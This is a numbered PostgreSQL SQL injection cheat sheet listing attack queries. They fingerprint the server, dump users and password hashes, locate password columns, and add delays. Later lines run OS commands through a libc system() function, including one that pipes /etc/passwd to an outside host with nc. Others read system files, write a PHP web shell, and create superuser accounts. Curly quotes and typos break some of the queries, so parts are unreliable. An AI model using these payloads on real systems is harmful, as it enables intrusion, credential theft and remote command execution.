SQL Injections

1. Version
2. SELECT version()
3.  
4. Comments   
5. SELECT 1; –comment
6. SELECT /*comment*/1;
7.  
8. Current User   
9. SELECT user;
10. SELECT current_user;
11. SELECT session_user;
12. SELECT usename FROM pg_user;
13. SELECT getpgusername();
14.  
15. List Users 
16. SELECT usename FROM pg_user
17.  
18. List Password Hashes   
19. SELECT usename, passwd FROM pg_shadow — priv
20.  
21. Password Cracker   
22. MDCrack can crack PostgreSQL’s MD5-based passwords.
23.  
24. List Privileges
25. SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
26.  
27. List DBA Accounts  
28. SELECT usename FROM pg_user WHERE usesuper IS TRUE
29.  
30. Current Database   
31. SELECT current_database()
32.  
33. List Databases 
34. SELECT datname FROM pg_database
35.  
36. List Columns   
37. SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’)
38.  
39. List Tables SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid)
40.  
41. Find Tables From Column Name   
42. If you want to list all the table names that contain a column LIKE ‘%password%’:SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%password%’;
43.  
44. Select Nth Row 
45. SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows numbered from 0
46. SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
47. Select Nth Char SELECT substr(‘abcd’, 3, 1); — returns c
48.  
49. Bitwise AND
50. SELECT 6 & 2; — returns 2
51. SELECT 6 & 1; –returns 0
52.  
53. ASCII Value -> Char
54. SELECT chr(65);
55.  
56. Char -> ASCII Value
57. SELECT ascii(‘A’);
58.  
59. Casting
60. SELECT CAST(1 as varchar);
61. SELECT CAST(’1′ as int);
62.  
63. String Concatenation   
64. SELECT ‘A’ || ‘B’; — returnsAB
65.  
66. If Statement   
67. IF statements only seem valid inside functions, so aren’t much use for SQL injection.  See CASE statement instead.
68. Case Statement  SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A
69.  
70. Avoiding Quotes
71. SELECT CHR(65)||CHR(66); — returns AB
72.  
73. Time Delay 
74. SELECT pg_sleep(10); — postgres 8.2+ only
75. CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6′, ‘sleep’ language ‘C’ STRICT; SELECT sleep(10); –priv, create your own sleep function.  Taken from here .
76.  
77. Make DNS Requests  
78. Generally not possible in postgres.  However if contrib/dblinkis installed (it isn’t by default) it can be used to resolve hostnames (assuming you have DBA rights):
79. SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb', 'SELECT version()') RETURNS (result TEXT);
80. Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. “ping pentestmonkey.net”.
81.  
82. Command Execution  
83. CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′, ‘system’ LANGUAGE ‘C’ STRICT; — privSELECT system(‘cat /etc/passwd | nc 10.0.0.1 8080′); — priv, commands run as postgres/pgsql OS-level user
84.  
85. Local File Access  
86. CREATE TABLE mydata(t text);
87. COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are readable by postgres OS-level user
88. …’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data back one row at a time
89. …’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data back one row at a time …
90. DROP TABLE mytest mytest;Write to a file:
91. CREATE TABLE mytable (mycol text);
92. INSERT INTO mytable(mycol) VALUES (‘<? pasthru($_GET[cmd]); ?>’);
93. COPY mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres OS-level user.  Generally you won’t be able to write to the web root, but it’s always work a try.
94. – priv user can also read/write files by mapping libc functions
95.  
96. Hostname, IP Address   
97. SELECT inet_server_addr(); — returns db server IP address (or null if using local connection)
98. SELECT inet_server_port(); — returns db server IP address (or null if using local connection)
99.  
100. Create Users   
101. CREATE USER test1 PASSWORD ‘pass1′; — priv
102. CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER; — priv, grant some privs at the same time
103.  
104. Drop Users 
105. DROP USER test1; — priv
106.  
107. Make User DBA  
108. ALTER USER test1 CREATEUSER CREATEDB; — priv
109.  
110. Location of DB files    SELECT current_setting(‘data_directory’); — priv
111. SELECT current_setting(‘hba_file’); — priv
112.  
113. Default/System Databases   
114. template0
115. template1